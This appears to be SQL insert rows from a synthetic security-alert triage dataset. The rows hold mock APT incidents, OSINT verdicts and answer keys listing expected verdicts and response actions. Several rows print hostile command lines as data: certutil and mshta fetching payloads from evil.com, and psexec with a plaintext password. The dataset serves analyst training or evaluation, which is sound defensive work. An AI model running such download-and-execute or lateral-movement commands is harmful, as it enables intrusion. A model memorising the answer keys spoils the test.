(1749, 'APT41 Exploitation Using CertUtil for C2 Communication', 'critical', 'MISP', 'Detected APT41 activity leveraging CertUtil to download a payload from a remote server. The command was executed on an internal host.', 'Malware', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T08:25:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.10.15\",\"dst_ip\":\"203.0.113.99\",\"username\":\"jdoe\",\"hostname\":\"corp-pc-01\",\"command_line\":\"certutil.exe -urlcache -split -f http://evil.com/payload.exe C:\\\\Temp\\\\payload.exe\"}', '2026-03-15 19:53:09', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 123 times for hosting malware\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"certutil.exe -urlcache -split -f http://evil.com/payload.exe C:\\\\Temp\\\\payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"CertUtil abuse detected for downloading malicious payloads\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"APT41 known for exploiting CertUtil to download and execute malicious payloads on targeted hosts.\"}', 'Advanced', 'TI', 7, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.161Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:25:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.15\\\",\\\"dst_ip\\\":\\\"203.0.113.99\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-pc-01\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://evil.com/payload.exe C:\\\\\\\\Temp\\\\\\\\payload.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.161Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:25:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.15\\\",\\\"dst_ip\\\":\\\"203.0.113.99\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-pc-01\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://evil.com/payload.exe C:\\\\\\\\Temp\\\\\\\\payload.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.161Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:25:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.15\\\",\\\"dst_ip\\\":\\\"203.0.113.99\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-pc-01\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://evil.com/payload.exe C:\\\\\\\\Temp\\\\\\\\payload.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.161Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:25:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.15\\\",\\\"dst_ip\\\":\\\"203.0.113.99\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-pc-01\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://evil.com/payload.exe C:\\\\\\\\Temp\\\\\\\\payload.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.161Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:25:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.15\\\",\\\"dst_ip\\\":\\\"203.0.113.99\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"corp-pc-01\\\",\\\"command_line\\\":\\\"certutil.exe -urlcache -split -f http://evil.com/payload.exe C:\\\\\\\\Temp\\\\\\\\payload.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1750, 'Lazarus Group Lateral Movement via PSExec', 'high', 'ThreatConnect', 'Suspected Lazarus Group activity detected using PSExec for lateral movement within the network targeting multiple hosts.', 'Lateral Movement', 'T1569', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:14:22Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"192.168.1.20\",\"username\":\"admin\",\"hostname\":\"server-01\",\"command_line\":\"psexec.exe \\\\\\\\192.168.1.20 -u admin -p password cmd.exe\"}', '2026-03-15 19:53:09', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in lateral movement attempt\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\192.168.1.20 -u admin -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"PSExec usage consistent with lateral movement techniques\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PSExec used for unauthorized command execution across the network, indicating lateral movement.\"}', 'Advanced', 'TI', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.176Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:14:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-01\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.20 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.176Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:14:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-01\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.20 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.176Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:14:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-01\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.20 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.176Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:14:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-01\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.20 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.176Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:14:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-01\\\",\\\"command_line\\\":\\\"psexec.exe \\\\\\\\\\\\\\\\192.168.1.20 -u admin -p password cmd.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1751, 'Cozy Bear Spear-Phishing Attempt with Malicious Link', 'high', 'Anomali', 'A spear-phishing email sent by Cozy Bear containing a malicious link was detected. The email was targeted towards a high-profile user.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T10:45:10Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.5.25\",\"username\":\"ceo@company.com\",\"hostname\":\"ceo-pc\",\"email_sender\":\"alerts@secure-mail.com\",\"request_body\":\"Click here to view your secure message: http://malicious-link.com\"}', '2026-03-15 19:53:09', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"url\",\"value\":\"http://malicious-link.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosts phishing page replicating a secure login prompt\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"alerts@secure-mail.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Email address associated with multiple phishing campaigns\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a malicious link disguised as a secure message, typical of Cozy Bear phishing tactics.\"}', 'Advanced', 'TI', 7, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.178Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:10Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.5.25\\\",\\\"username\\\":\\\"ceo@company.com\\\",\\\"hostname\\\":\\\"ceo-pc\\\",\\\"email_sender\\\":\\\"alerts@secure-mail.com\\\",\\\"request_body\\\":\\\"Click here to view your secure message: http://malicious-link.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.178Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:10Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.5.25\\\",\\\"username\\\":\\\"ceo@company.com\\\",\\\"hostname\\\":\\\"ceo-pc\\\",\\\"email_sender\\\":\\\"alerts@secure-mail.com\\\",\\\"request_body\\\":\\\"Click here to view your secure message: http://malicious-link.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.178Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:10Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.5.25\\\",\\\"username\\\":\\\"ceo@company.com\\\",\\\"hostname\\\":\\\"ceo-pc\\\",\\\"email_sender\\\":\\\"alerts@secure-mail.com\\\",\\\"request_body\\\":\\\"Click here to view your secure message: http://malicious-link.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.178Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:10Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.5.25\\\",\\\"username\\\":\\\"ceo@company.com\\\",\\\"hostname\\\":\\\"ceo-pc\\\",\\\"email_sender\\\":\\\"alerts@secure-mail.com\\\",\\\"request_body\\\":\\\"Click here to view your secure message: http://malicious-link.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.178Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:10Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.5.25\\\",\\\"username\\\":\\\"ceo@company.com\\\",\\\"hostname\\\":\\\"ceo-pc\\\",\\\"email_sender\\\":\\\"alerts@secure-mail.com\\\",\\\"request_body\\\":\\\"Click here to view your secure message: http://malicious-link.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1752, 'Fancy Bear Data Exfiltration via GitHub', 'critical', 'Recorded Future', 'Anomalous data transfer to a GitHub repository suspected to be used by Fancy Bear for exfiltrating sensitive data.', 'Data Exfil', 'T1041', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:30:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.200.5\",\"dst_ip\":\"140.82.112.3\",\"username\":\"analytics\",\"hostname\":\"data-node-07\",\"request_body\":\"POST /repos/fancybear/exfil.git\"}', '2026-03-15 19:53:09', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"140.82.112.3\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"GitHub IP associated with suspicious repositories\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"POST /repos/fancybear/exfil.git\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Suspicious POST request to GitHub repository\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The data transfer to a GitHub repository aligns with known Fancy Bear data exfiltration methods.\"}', 'Advanced', 'TI', 7, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.181Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.200.5\\\",\\\"dst_ip\\\":\\\"140.82.112.3\\\",\\\"username\\\":\\\"analytics\\\",\\\"hostname\\\":\\\"data-node-07\\\",\\\"request_body\\\":\\\"POST /repos/fancybear/exfil.git\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.181Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.200.5\\\",\\\"dst_ip\\\":\\\"140.82.112.3\\\",\\\"username\\\":\\\"analytics\\\",\\\"hostname\\\":\\\"data-node-07\\\",\\\"request_body\\\":\\\"POST /repos/fancybear/exfil.git\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.181Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.200.5\\\",\\\"dst_ip\\\":\\\"140.82.112.3\\\",\\\"username\\\":\\\"analytics\\\",\\\"hostname\\\":\\\"data-node-07\\\",\\\"request_body\\\":\\\"POST /repos/fancybear/exfil.git\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.181Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.200.5\\\",\\\"dst_ip\\\":\\\"140.82.112.3\\\",\\\"username\\\":\\\"analytics\\\",\\\"hostname\\\":\\\"data-node-07\\\",\\\"request_body\\\":\\\"POST /repos/fancybear/exfil.git\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.181Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.200.5\\\",\\\"dst_ip\\\":\\\"140.82.112.3\\\",\\\"username\\\":\\\"analytics\\\",\\\"hostname\\\":\\\"data-node-07\\\",\\\"request_body\\\":\\\"POST /repos/fancybear/exfil.git\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1753, 'APT41 Zero-Day Exploitation via MSHTA', 'critical', 'MISP', 'APT41 was observed using a zero-day vulnerability with MSHTA to execute malicious scripts remotely.', 'Malware', 'T1218', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T12:15:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.30.15\",\"dst_ip\":\"203.0.113.100\",\"username\":\"mark\",\"hostname\":\"workstation-10\",\"command_line\":\"mshta.exe http://evil.com/malicious.hta\"}', '2026-03-15 19:53:09', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP linked to distribution of malicious HTA scripts\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"mshta.exe http://evil.com/malicious.hta\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"MSHTA used to execute remote malicious scripts\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"APT41 known for leveraging MSHTA in zero-day attacks for remote code execution.\"}', 'Advanced', 'TI', 7, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.195Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:15:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.30.15\\\",\\\"dst_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"mark\\\",\\\"hostname\\\":\\\"workstation-10\\\",\\\"command_line\\\":\\\"mshta.exe http://evil.com/malicious.hta\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.195Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:15:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.30.15\\\",\\\"dst_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"mark\\\",\\\"hostname\\\":\\\"workstation-10\\\",\\\"command_line\\\":\\\"mshta.exe http://evil.com/malicious.hta\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.195Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:15:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.30.15\\\",\\\"dst_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"mark\\\",\\\"hostname\\\":\\\"workstation-10\\\",\\\"command_line\\\":\\\"mshta.exe http://evil.com/malicious.hta\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.195Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:15:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.30.15\\\",\\\"dst_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"mark\\\",\\\"hostname\\\":\\\"workstation-10\\\",\\\"command_line\\\":\\\"mshta.exe http://evil.com/malicious.hta\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.195Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:15:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.30.15\\\",\\\"dst_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"mark\\\",\\\"hostname\\\":\\\"workstation-10\\\",\\\"command_line\\\":\\\"mshta.exe http://evil.com/malicious.hta\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1754, 'Suspicious PowerShell Activity with Encoded Commands', 'medium', 'ThreatConnect', 'Detected PowerShell execution with encoded commands indicative of possible obfuscation, but analysis shows benign activity.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T13:42:17Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.50.30\",\"dst_ip\":\"N/A\",\"username\":\"admin\",\"hostname\":\"server-12\",\"command_line\":\"powershell.exe -enc SQBTAFQAZwBlAHQALQBXAEkAbgBkAG8AdwAgAEEAZABkAGkAdABpAG8AbgBhAGwAIAAtAFQAbwBkAGEAeQApAA==\"}', '2026-03-15 19:53:09', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -enc SQBTAFQAZwBlAHQALQBXAEkAbgBkAG8AdwAgAEEAZABkAGkAdABpAG8AbgBhAGwAIAAtAFQAbwBkAGEAeQApAA==\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Encoded PowerShell command decoded to benign administrative script\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell command was found to be a legitimate administrative script.\"}', 'Advanced', 'TI', 7, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.207Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:42:17Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.50.30\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-12\\\",\\\"command_line\\\":\\\"powershell.exe -enc SQBTAFQAZwBlAHQALQBXAEkAbgBkAG8AdwAgAEEAZABkAGkAdABpAG8AbgBhAGwAIAAtAFQAbwBkAGEAeQApAA==\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.207Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:42:17Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.50.30\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-12\\\",\\\"command_line\\\":\\\"powershell.exe -enc SQBTAFQAZwBlAHQALQBXAEkAbgBkAG8AdwAgAEEAZABkAGkAdABpAG8AbgBhAGwAIAAtAFQAbwBkAGEAeQApAA==\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.207Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:42:17Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.50.30\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-12\\\",\\\"command_line\\\":\\\"powershell.exe -enc SQBTAFQAZwBlAHQALQBXAEkAbgBkAG8AdwAgAEEAZABkAGkAdABpAG8AbgBhAGwAIAAtAFQAbwBkAGEAeQApAA==\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.207Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:42:17Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.50.30\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-12\\\",\\\"command_line\\\":\\\"powershell.exe -enc SQBTAFQAZwBlAHQALQBXAEkAbgBkAG8AdwAgAEEAZABkAGkAdABpAG8AbgBhAGwAIAAtAFQAbwBkAGEAeQApAA==\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.207Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:42:17Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.50.30\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-12\\\",\\\"command_line\\\":\\\"powershell.exe -enc SQBTAFQAZwBlAHQALQBXAEkAbgBkAG8AdwAgAEEAZABkAGkAdABpAG8AbgBhAGwAIAAtAFQAbwBkAGEAeQApAA==\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
